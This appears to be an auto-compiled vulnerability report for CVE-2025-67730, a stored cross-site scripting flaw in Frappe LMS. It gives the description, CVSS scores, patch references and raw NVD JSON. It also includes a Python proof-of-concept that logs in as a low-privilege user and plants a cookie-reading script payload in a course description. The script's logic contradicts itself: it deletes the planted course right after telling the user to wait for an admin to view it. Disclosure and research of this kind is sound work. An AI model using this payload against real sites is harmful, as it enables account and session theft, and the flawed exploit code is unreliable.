Security Vulnerability Report
CVE-2025-67730 CVSS 5.4 MEDIUM

CVE-2025-67730

Published: 2025-12-12 08:15:48
Last Modified: 2025-12-15 17:27:22

Description

Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Versions prior to 2.42.0 allow authenticated users to add malicious HTML and JavaScript through description fields in the Job, Course and Batch forms. This issue is fixed in version 2.42.0.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:* - VULNERABLE
Frappe LMS < 2.42.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-67730 PoC - Stored XSS in Frappe LMS
# Target: Frappe LMS < 2.42.0

base_url = "https://target-site.com"
login_url = f"{base_url}/api/method/login"
xss_payload = "<script>alert(document.cookie)</script>"

session = requests.Session()

# Step 1: Login with low-privilege account
login_data = {
    "usr": "[email protected]",
    "pwd": "password123"
}
response = session.post(login_url, json=login_data)

# Step 2: Create Course with XSS payload in description
course_url = f"{base_url}/api/method/lms.lms.doctype.course.course"
course_data = {
    "title": "Malicious Course",
    "description": xss_payload,
    "course_template": "",
    "enable_legacy_link": False
}
response = session.post(course_url, json=course_data)

# Step 3: When admin views the course, XSS executes
print("XSS payload injected successfully")
print("Wait for admin to view the course page")

# Cleanup: Delete the malicious course
course_name = response.json().get("data", {}).get("name")
delete_url = f"{base_url}/api/method/frappe.client.delete"
session.post(delete_url, json={"doctype": "Course", "name": course_name})

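References

Patch: https://github.com/frappe/lms/commit/0877e32e1bfe64831b875707241de1c449cda45c
Vendor Advisory: https://github.com/frappe/lms/security/advisories/GHSA-jjc4-j3hw-33h2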

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67730", "sourceIdentifier": "[email protected]", "published": "2025-12-12T08:15:48.210", "lastModified": "2025-12-15T17:27:21.867", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Versions prior to 2.42.0 allow authenticated users to add malicious HTML and JavaScript through description fields in the Job, Course and Batch forms. This issue is fixed in version 2.42.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.42.0", "matchCriteriaId": "E8908A38-7B64-4B77-9423-86532826C317"}]}]}], "references": [{"url": "https://github.com/frappe/lms/commit/0877e32e1bfe64831b875707241de1c449cda45c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/frappe/lms/security/advisories/GHSA-jjc4-j3hw-33h2", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}